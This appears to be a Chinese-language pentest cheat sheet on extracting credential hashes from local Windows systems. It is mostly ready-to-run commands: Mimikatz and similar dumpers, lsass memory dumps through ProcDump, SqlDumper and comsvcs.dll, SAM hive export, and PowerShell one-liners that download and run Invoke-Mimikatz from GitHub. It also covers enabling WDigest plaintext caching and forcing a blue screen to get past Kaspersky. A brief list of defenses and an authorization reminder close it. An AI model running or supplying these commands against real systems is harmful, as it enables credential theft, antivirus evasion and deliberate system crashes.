Windows本地hashdump备忘录
字数 1085 2025-08-25 22:58:34

Windows本地Hashdump技术全面指南

概述

Windows本地密码提取技术主要通过访问lsass.exe进程内存或SAM数据库来获取凭证信息。杀毒软件主要监控和保护这两个关键点,因此绕过杀软的关键在于如何合法访问这些资源。

常用工具及使用方法

1. Mimikatz

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"
  • 功能:直接从lsass.exe内存提取登录凭证
  • 特点:最著名的凭证提取工具,支持多种提取方式

2. QuarksPwDump

QuarksPwDump.exe -dhl
  • 功能:提取本地账户哈希
  • 特点:支持多种哈希提取模式

3. Windows Credentials Editor (WCE)

wce.exe -w
  • 功能:提取明文凭证和哈希
  • 特点:体积小,功能专一

4. PwDump7

PwDump7.exe
  • 功能:提取本地SAM数据库中的哈希
  • 特点:专注于SAM数据库提取

5. LaZagne

laZagne_x86.exe windows
  • 功能:提取多种凭证,包括浏览器、邮件客户端等
  • 特点:支持多种应用程序凭证提取

Lsass内存Dump技术

1. SharpDump

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do SharpDump.exe %i
  • 特点:.NET实现的lsass内存转储工具

2. ProcDump

Procdump.exe -accepteula -ma lsass.exe lsass.dmp
  • 特点:微软官方工具,常用于绕过杀软检测

3. SqlDumper

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do Sqldumper.exe %i 0 0x01100
  • 特点:SQL Server附带工具,可用于转储进程内存

4. Rundll32方法

for /f "tokens=2" %i in ('tasklist /FI "IMAGENAME eq lsass.exe" /NH') do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump %i .\lsass.dmp full
  • 特点:利用系统自带组件转储内存

SAM数据库提取技术

  1. 导出SAM和SYSTEM文件:
reg save hklm\sam .\sam.hive
reg save hklm\system .\system.hive
  1. 使用工具解析:
  • 可使用SAMInside或Mimikatz解析导出的文件
  • 提取NT-Hash后可进行破解

无文件加载技术

1. PowerShell加载Mimikatz

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"

2. PowerShell加载ProcDump

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/TheKingOfDuck/hashdump/master/procdump/procdump.ps1');Invoke-Procdump64 -Args '-accepteula -ma lsass.exe lsass.dmp'"

Windows 10/2012+特殊配置

启用Wdigest Auth保存明文凭证:

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
  • 键值1表示保存明文凭证,0则不保存
  • 修改后需要重新登录生效

高级绕过技术(针对卡巴斯基)

  1. 强制蓝屏获取完整内存转储:
taskkill /f /im "wininit.exe"
  • 原理:制造系统崩溃生成MEMORY.DMP文件
  • 可从完整内存转储中提取lsass信息
  1. 替代方案:
  • 使用底层API添加用户(卡巴通常不拦截)

总结与建议

  1. 评估标准:能否绕过卡巴斯基可作为通用评估标准
  2. 工具选择:
    • 优先使用微软官方工具(如ProcDump)
    • 考虑无文件加载方式降低检测率
  3. 防护建议:
    • 保护lsass.exe进程
    • 监控SAM数据库访问
    • 限制调试权限

资源获取

所有编译好的工具可在以下地址获取:
https://github.com/TheKingOfDuck/hashdump

注意事项

  1. 所有操作需要管理员权限
  2. 在渗透测试中,确保获得合法授权
  3. 部分技术可能触发系统防护机制
  4. 实际效果可能因系统版本和安全配置而异
Windows本地Hashdump技术全面指南 概述 Windows本地密码提取技术主要通过访问lsass.exe进程内存或SAM数据库来获取凭证信息。杀毒软件主要监控和保护这两个关键点,因此绕过杀软的关键在于如何合法访问这些资源。 常用工具及使用方法 1. Mimikatz 功能:直接从lsass.exe内存提取登录凭证 特点:最著名的凭证提取工具,支持多种提取方式 2. QuarksPwDump 功能:提取本地账户哈希 特点:支持多种哈希提取模式 3. Windows Credentials Editor (WCE) 功能:提取明文凭证和哈希 特点:体积小,功能专一 4. PwDump7 功能:提取本地SAM数据库中的哈希 特点:专注于SAM数据库提取 5. LaZagne 功能:提取多种凭证,包括浏览器、邮件客户端等 特点:支持多种应用程序凭证提取 Lsass内存Dump技术 1. SharpDump 特点:.NET实现的lsass内存转储工具 2. ProcDump 特点:微软官方工具,常用于绕过杀软检测 3. SqlDumper 特点:SQL Server附带工具,可用于转储进程内存 4. Rundll32方法 特点:利用系统自带组件转储内存 SAM数据库提取技术 导出SAM和SYSTEM文件: 使用工具解析: 可使用SAMInside或Mimikatz解析导出的文件 提取NT-Hash后可进行破解 无文件加载技术 1. PowerShell加载Mimikatz 2. PowerShell加载ProcDump Windows 10/2012+特殊配置 启用Wdigest Auth保存明文凭证: 键值1表示保存明文凭证,0则不保存 修改后需要重新登录生效 高级绕过技术(针对卡巴斯基) 强制蓝屏获取完整内存转储: 原理:制造系统崩溃生成MEMORY.DMP文件 可从完整内存转储中提取lsass信息 替代方案: 使用底层API添加用户(卡巴通常不拦截) 总结与建议 评估标准:能否绕过卡巴斯基可作为通用评估标准 工具选择: 优先使用微软官方工具(如ProcDump) 考虑无文件加载方式降低检测率 防护建议: 保护lsass.exe进程 监控SAM数据库访问 限制调试权限 资源获取 所有编译好的工具可在以下地址获取: https://github.com/TheKingOfDuck/hashdump 注意事项 所有操作需要管理员权限 在渗透测试中,确保获得合法授权 部分技术可能触发系统防护机制 实际效果可能因系统版本和安全配置而异